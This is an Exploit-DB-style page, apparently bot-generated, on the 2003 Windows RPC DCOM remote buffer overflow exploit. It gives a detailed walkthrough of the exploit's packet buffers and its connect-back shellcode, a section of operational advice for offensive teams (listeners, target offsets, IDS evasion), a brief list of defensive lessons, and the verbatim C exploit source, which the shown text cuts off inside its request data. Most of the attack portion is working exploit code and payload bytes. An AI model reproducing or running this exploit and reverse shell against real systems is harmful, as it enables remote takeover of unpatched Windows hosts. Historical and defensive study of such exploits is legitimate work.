By exploitdb papers bot•July 29, 2003•

papers

Understanding the 'RPC DCOM' Remote Exploit (Paper ID: 69)

What this paper is

This paper details a remote exploit for Microsoft Windows systems that targets the Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) service. The exploit, developed by pHrail and smurfy, with offsets contributed by teos, aims to gain remote code execution on vulnerable Windows machines. It provides a list of 19 specific Windows versions and service pack combinations that are potentially vulnerable.

Simple technical breakdown

The exploit works by sending specially crafted network packets to the target machine's DCOM RPC endpoint (typically port 135). These packets are designed to trigger a buffer overflow vulnerability within the DCOM RPC service. When the overflow occurs, it overwrites critical memory locations, allowing the attacker to redirect the program's execution flow to a payload (shellcode) that is also sent as part of the exploit. This shellcode then executes on the target machine, often establishing a reverse shell connection back to the attacker.

The exploit leverages the DCOM RPC protocol to communicate with the target. It first sends an initial "bind" request to establish a connection and then follows up with a more complex "request" that contains the shellcode and the necessary data to trigger the vulnerability. The exploit includes specific offsets for various Windows versions to ensure successful exploitation.

Complete code and payload walkthrough

The provided C code implements the exploit logic. Let's break down the key components:

Data Structures and Constants

#define DWORD unsigned long: Defines a 32-bit unsigned integer type.
#define SOCKET_ERROR -1: Defines a constant for socket errors.

Network Payloads (Data Buffers)

unsigned char bindstr[]: This buffer contains the initial data sent to establish a DCOM RPC connection. It's a sequence of bytes representing a DCOM bind request.
- 0x05, 0x00, 0x0B, 0x03, 0x10, 0x00, 0x00, 0x00: DCOM header information.
- 0x48, 0x00, 0x00, 0x00: Length and type information.
- 0x7F, 0x00, 0x00, 0x00: Network address information.
- 0xD0, 0x16, 0xD0, 0x16, 0x00, 0x00, 0x00, 0x00: Interface UUID and version information.
- 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00: Protocol sequence and binding information.
- 0xa0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00: Security information.
- 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00: More DCOM specific data.
- 0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00: This appears to be a part of the DCOM interface identifier or related data.
unsigned char request1[]: This is the primary exploit packet. It contains a large amount of data, including DCOM RPC calls, object identifiers, and the buffer that will be overflowed.
- The initial bytes 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xE8, 0x03, 0x00, 0x00, 0xE5, 0x00, 0x00, 0x00, 0xD0, 0x03, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x05, 0x00, 0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x32, 0x24, 0x58, 0xFD, 0xCC, 0x45, 0x64, 0x49, 0xB0, 0x70, 0xDD, 0xAE, 0x74, 0x2C, 0x96, 0xD2, 0x60, 0x5E, 0x0D, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x5E, 0x0D, 0x00, 0x02, 0x00, 0x00, 0x00, 0x7C, 0x5E, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x80, 0x96, 0xF1, 0xF1, 0x2A, 0x4D, 0xCE, 0x11, 0xA6, 0x6A, 0x00, 0x20, 0xAF, 0x6E, 0x72, 0xF4, 0x0C, 0x00, 0x00, 0x00, 0x4D, 0x41, 0x52, 0x42, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0xF0, 0xAD, 0xBA, 0x00, 0x00, 0x00, 0x00, 0xA8, 0xF4, 0x0B, 0x00, 0x60, 0x03, 0x00, 0x00, 0x60, 0x03, 0x00, 0x00, 0x4D, 0x45, 0x4F, 0x57, 0x04, 0x00, 0x00, 0x00, 0xA2, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x38, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 0x30, 0x03, 0x00, 0x00, 0x28, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xC8, 0x00, 0x00, 0x00, 0x4D, 0x45, 0x4F, 0x57, 0x28, 0x03, 0x00, 0x00, 0xD8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC4, 0x28, 0xCD, 0x00, 0x64, 0x29, 0xCD, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xB9, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xAB, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xA5, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xA6, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xA4, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xAD, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xAA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x07, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x78, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x50, 0x00, 0x00, 0x00, 0x4F, 0xB6, 0x88, 0x20, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x00, 0x00, 0x00, 0x07, 0x00, 0x66, 0x00, 0x06, 0x09, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x78, 0x19, 0x0C, 0x00, 0x58, 0x00, 0x00, 0x00, 0x05, 0x00, 0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x70, 0xD8, 0x98, 0x93, 0x98, 0x4F, 0xD2, 0x11, 0xA9, 0x3D, 0xBE, 0x57, 0xB2, 0x00, 0x00, 0x00, 0x32, 0x00, 0x31, 0x00, 0x01, 0x10, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x80, 0x00, 0x00, 0x00, 0x0D, 0xF0, 0xAD, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x43, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x4D, 0x45, 0x4F, 0x57, 0x04, 0x00, 0x00, 0x00, 0xC0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x3B, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x81, 0xC5, 0x17, 0x03, 0x80, 0x0E, 0xE9, 0x4A, 0x99, 0x99, 0xF1, 0x8A, 0x50, 0x6F, 0x7A, 0x85, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x30, 0x00, 0x00, 0x00, 0x78, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD8, 0xDA, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x2F, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x46, 0x00, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x10, 0x00, 0x00, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x68, 0x00, 0x00, 0x00, 0x0E, 0x00, 0xFF, 0xFF, 0x68, 0x8B, 0x0B, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00: This is a complex sequence of bytes representing DCOM RPC calls. It includes object identifiers (like 0x4D415242 for "MARB" and 0x4D454F57 for "MEOW"), method calls, and data structures that are part of the DCOM protocol. The 0xCC bytes are typically used as placeholders for data that will be overwritten or as a debugging marker. The 0x01, 0x10, 0x08, 0x00 sequence often indicates a specific RPC operation or data structure.
unsigned char request2[]: This buffer contains additional data that is appended to request1. It seems to adjust lengths and add more DCOM-related information.
- 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x5C, 0x00, 0x5C, 0x00: This looks like a small DCOM RPC fragment, possibly related to string handling or path information.
unsigned char request3[]: Another DCOM RPC fragment.
- 0x5C, 0x00, 0x43, 0x00, 0x24, 0x00, 0x5C, 0x00, 0x31, 0x00, 0x32, 0x00, 0x33, 0x00, 0x34, 0x00, 0x35, 0x00, 0x36, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x2E, 0x00, 0x64, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x00, 0x00: This sequence of bytes, when interpreted as UTF-16 little-endian characters, forms the string \C$\1234561111111111.doc\0. This is likely part of a path or filename being manipulated by the DCOM service.
unsigned char sc[]: This is the shellcode. It's designed to be executed on the target system after the buffer overflow.
- \x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00: This part is unclear without further analysis of the shellcode's internal structure. It might be part of the shellcode's initialization or setup.
- \x29\x4c\xdf\x77 (sp4): This is a target-specific offset for Windows 2000 SP4. It's placed within the shellcode, indicating it's used to calculate the return address or jump to a specific location.
- \x38\x6e\x16\x76\x0d\x6e\x16\x76: This sequence is also part of the shellcode's execution logic.
- \xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30\x93\x40\xe2\xfa: This is the initial stage of the shellcode. It appears to be a small stub that prepares the environment for the main payload. It likely contains instructions for setting up registers, potentially resolving API calls, and then jumping to the larger payload.
- The subsequent long sequence of bytes (e.g., \x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1...) is the main body of the shellcode. This is where the actual malicious actions are performed. Based on typical shellcode for this era, it would likely:
  - Resolve the address of ws2_32.dll and kernel32.dll.
  - Find the address of WSAStartup, socket, connect, and CreateProcess (or similar functions for reverse shell).
  - Establish a network connection back to the attacker's specified IP address and port (connect-back shell).
  - Execute a command shell (cmd.exe) on the target and redirect its input/output to the established connection.
- The final \x90\x90... bytes are NOP (No Operation) instructions, often used as padding to ensure the shellcode lands correctly or to create a "slide" for the execution flow.
unsigned char request4[]: Another DCOM RPC fragment, likely used in conjunction with the other requests.
- 0x01, 0x10, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x20, 0x00, 0x00, 0x00, 0x30, 0x00, 0x2D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x88, 0x2A, 0x0C, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x8C, 0x0C, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00: This also appears to be a DCOM RPC fragment, containing more object identifiers and data. The 0xCC bytes again suggest areas that might be overwritten or are part of the exploit's payload construction.

Target Offsets

char win2knosppl[], char win2ksp3pl[], etc.: These are arrays of bytes representing specific memory addresses (offsets) for different Windows versions and service packs. These offsets are crucial for the exploit to correctly calculate where to jump after the buffer overflow to execute the shellcode. The format \xXX\xXX\xXX\xXX represents a little-endian 32-bit address.

Main Function Logic

int main(int argc, char ** argv): The entry point of the program.
Argument Parsing: The code checks if the correct number of command-line arguments are provided: <victim>, <connectback ip>, <cb port>, and <target>.
- argv[1]: The IP address or hostname of the target machine.
- argv[2]: The IP address of the attacker's machine for the reverse shell connection.
- argv[3]: The port on the attacker's machine to connect back to.
- argv[4]: A numerical index specifying the target Windows version.
Socket Initialization:
- gethostbyname(argv[1]): Resolves the target's hostname to an IP address.
- socket(AF_INET, SOCK_STREAM, 0): Creates a TCP socket.
- their_addr: Structures the target's address (IP and port 135).
- connect(sockfd, ...): Establishes a TCP connection to the target on port 135.
Target Offset Selection:
- A series of if-else if statements select the correct offset from the win2k... or winxp... arrays based on the argv[4] target number.
- memcpy(sc+36, ..., sizeof(...)): This copies the selected offset into the sc (shellcode) buffer at a specific position (offset 36). This is where the exploit injects the target-specific return address or jump instruction.
Connect-Back Information Encoding:
- port1 = htons(atoi(argv[3])): Converts the attacker's connect-back port to network byte order.
- port1 ^= 0x9393: XORs the port with 0x9393. This is a simple obfuscation technique.
- cb = inet_addr(argv[2]): Converts the attacker's IP address to a network address.
- cb ^= 0x93939393: XORs the IP address with 0x93939393.
- *(unsigned short *)&sc[330+0x30] = port1;: Writes the XORed port into the shellcode at a specific offset (0x30 is 48 in decimal, so 330 + 48 = 378).
- *(unsigned int *)&sc[335+0x30] = cb;: Writes the XORed IP address into the shellcode at a specific offset (335 + 48 = 383). These locations within the shellcode are where the connect-back IP and port are expected to be found and decoded by the shellcode itself.
Packet Construction:
- memcpy(buf2, request1, sizeof(request1)): Initializes buf2 with the first part of the exploit payload.
- The code then dynamically modifies parts of request2 and request1 by adding the size of the shellcode (sizeof(sc)) to certain values. This is common in buffer overflow exploits where the size of the injected data needs to be reflected in the packet headers or lengths.
- memcpy(buf2+len1, request2, sizeof(request2)), memcpy(buf2+len1, sc, sizeof(sc)), memcpy(buf2+len1, request3, sizeof(request3)), memcpy(buf2+len1, request4, sizeof(request4)): These lines concatenate the different parts of the exploit payload (request1, request2, the shellcode sc, request3, and request4) into a single buffer buf2.
- Several *(DWORD *)(buf2 + offset) = *(DWORD *)(buf2 + offset) + sizeof(sc) - 0xc; lines update DWORD values within buf2. This is crucial for correctly calculating lengths and offsets within the DCOM RPC packets after the shellcode has been appended. The - 0xc likely accounts for some fixed overhead or padding.
Sending Exploit:
- send(sockfd, bindstr, sizeof(bindstr), 0): Sends the initial bindstr to the target.
- recv(sockfd, buf1, 1000, NULL): Receives a response from the target.
- send(sockfd, buf2, len1, 0): Sends the complete exploit payload (buf2) to the target.
- recv(sockfd, buf1, 1024, NULL): Receives a final response.

Code Fragment/Block -> Practical Purpose Mapping

bindstr: Initiates a DCOM RPC connection with the target.
request1, request2, request3, request4: These buffers, when combined and modified, form the complete exploit packet designed to trigger a buffer overflow in the DCOM RPC service. They contain DCOM RPC calls, object identifiers, and the payload.
sc: The shellcode containing the exploit's payload. It includes a connect-back reverse shell mechanism and target-specific offsets.
win2k... / winxp... char arrays: Target-specific offsets used to calculate the correct return address for the shellcode.
main function argument parsing: Defines how the user specifies the target, attacker IP/port, and target OS version.
connect(): Establishes the initial network connection to the target's DCOM RPC service (port 135).
memcpy(sc+36, ..., sizeof(...)): Injects the target-specific offset into the shellcode.
port1 ^= 0x9393; cb ^= 0x93939393;: Obfuscates the connect-back IP and port before embedding them in the shellcode.
*(unsigned short *)&sc[330+0x30] = port1; *(unsigned int *)&sc[335+0x30] = cb;: Embeds the obfuscated connect-back information into the shellcode.
Concatenation and length adjustments (*(DWORD *)(buf2 + offset) = ...): Assembles the final exploit packet and ensures DCOM RPC length fields are correct after adding the shellcode.
send(sockfd, bindstr, ...): Sends the initial DCOM bind request.
send(sockfd, buf2, ...): Sends the main exploit packet containing the shellcode.

Practical details for offensive operations teams

Required Access Level: Network access to the target machine's port 135 (RPC Endpoint Mapper). No local access is required.
Lab Preconditions:
- A controlled network environment to test against vulnerable Windows versions.
- A listener (e.g., netcat) running on the attacker's machine on the specified connect-back port.
- A vulnerable Windows target machine configured with DCOM RPC enabled and accessible over the network.
- The exploit code compiled on a Linux or BSD system (as it uses standard socket APIs).
Tooling Assumptions:
- A C compiler (like GCC) to compile the exploit.
- netcat or a similar tool for listening for the reverse shell.
- Network scanning tools (like Nmap) to identify open port 135 and potentially fingerprint OS versions.
Execution Pitfalls:
- Target Specificity: The exploit is highly dependent on the correct target offset being selected. Using the wrong offset will likely lead to a crash or no execution.
- Network Latency/Packet Loss: Unreliable networks can cause the DCOM RPC communication to fail, leading to the exploit not being sent correctly or the target not processing it.
- Firewall/IDS Evasion: Port 135 is a well-known port. Network security devices might detect or block the exploit traffic. The DCOM protocol itself can be complex and might require more sophisticated evasion techniques if the initial connection is blocked.
- Shellcode Encoding/Obfuscation: The shellcode is not heavily obfuscated. Modern IDS/IPS systems might detect the shellcode's signature. The XOR encoding for the connect-back IP/port is basic.
- Service Stability: The exploit targets a core Windows service. A failed exploit attempt could potentially destabilize the target system or cause the DCOM RPC service to crash, leading to a denial of service.
- Patching: This exploit targets vulnerabilities present in older Windows versions. Modern, patched systems will not be vulnerable.
Telemetry:
- Network Traffic: Outbound connection attempts to port 135 on the target. Large data transfers from the attacker to the target on port 135. Inbound connection attempts from the target to the attacker's specified IP and port (for the reverse shell).
- System Logs: Event logs on the target system might show RPC errors, service crashes (if the exploit causes instability), or the creation of new processes (e.g., cmd.exe).
- Process Monitoring: On the target, the appearance of a cmd.exe process or other unexpected processes spawned by the DCOM RPC service.

Where this was used and when

This exploit was published in July 2003. At that time, Windows 2000 and early versions of Windows XP were widely deployed. Exploits targeting DCOM RPC were common in the early 2000s due to the complexity and widespread use of RPC services, which often presented attack surfaces. This specific exploit would have been relevant against Windows 2000 and Windows XP systems that had not been patched against this particular vulnerability.

Defensive lessons for modern teams

Patch Management: The most critical defense is to keep operating systems and services updated with the latest security patches. This exploit targets known vulnerabilities that have long been patched.
Network Segmentation and Firewalling: Restricting access to critical ports like 135 from untrusted networks is essential. DCOM RPC should ideally not be exposed directly to the internet.
Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS solutions can detect anomalous network traffic patterns, including malformed DCOM packets or known exploit signatures.
Endpoint Detection and Response (EDR): EDR solutions can monitor for suspicious process creation, network connections, and API calls that might indicate a compromise, even if the initial network exploit is successful.
Least Privilege: Ensure that services run with the minimum necessary privileges. If a service is compromised, the impact is limited.
Vulnerability Management: Regularly scan networks for vulnerable systems and prioritize patching.

ASCII visual (if applicable)

+-------------------+      +-------------------+      +-------------------+
| Attacker Machine  |      | Network Firewall  |      | Target Machine    |
| (Exploit Client)  |      | (Optional)        |      | (Windows 2000/XP) |
+-------------------+      +-------------------+      +-------------------+
        |                        |                          |
        | 1. Connect to Port 135   |                          |
        |    (DCOM RPC)            |                          |
        |------------------------>|                          |
        |                        |                          |
        | 2. Send Exploit Packet   |                          |
        |    (request1+sc+...)     |                          |
        |------------------------>|                          |
        |                        |  3. Exploit triggers       |
        |                        |     Buffer Overflow        |
        |                        |                          |
        |                        |  4. Shellcode executes   |
        |                        |     (Reverse Shell)      |
        |                        |                          |
        |                        |  5. Target connects back |
        |                        |     to Attacker IP:Port  |
        |                        |<--------------------------|
        |                        |                          |
        | 6. Attacker receives     |                          |
        |    shell connection      |                          |
        |<------------------------|                          |
        |                        |                          |
+-------------------+      +-------------------+      +-------------------+

This diagram illustrates the basic flow: the attacker connects to the target's DCOM RPC port, sends the exploit, which triggers a vulnerability, leading to shellcode execution and a reverse shell connection back to the attacker.

Source references

Paper ID: 69
Paper Title: Microsoft Windows - 'RPC DCOM' Remote (1)
Author: pHrail
Published: 2003-07-29
Keywords: Windows, remote
Paper URL: https://www.exploit-db.com/papers/69
Raw URL: https://www.exploit-db.com/raw/69

Original Exploit-DB Content (Verbatim)

//////////////////////////////////////////////////////////////////////////////////////////////
//
//             Windows RPC DCOM Remote Exploit with 18 Targets
//                  by pHrail and smurfy + some offsets by teos
//            
//  Targets: 
//                0 Win2k Polish nosp ver 5.00.2195
//                1 Win2k Polish +sp3 ver 5.00.2195
//                2 Win2k Spanish +sp4
//                3 Win2k English nosp 1
//                4 Win2k English nosp 2
//                5 Win2k English +sp1
//                6 Win2k English +sp2 1
//                7 Win2k English +sp2 2
//                8 Win2k English +sp3 1
//                9 Win2k English +sp3 2
//                10 Win2k English +sp4
//                11 Win2k China +sp3
//                12 Win2k China +sp4
//                13 Win2k German +sp3
//                14 Win2k Japanese +sp2
//                15 WinXP English nosp ver 5.1.2600
//                16 WinXP English +sp1 1
//                17 WinXP English +sp1 2
//                18 WinXP English +sp2
//
//////////////////////////////////////////////////////////////////////////////////////////////



#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DWORD unsigned long
#define SOCKET_ERROR -1

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
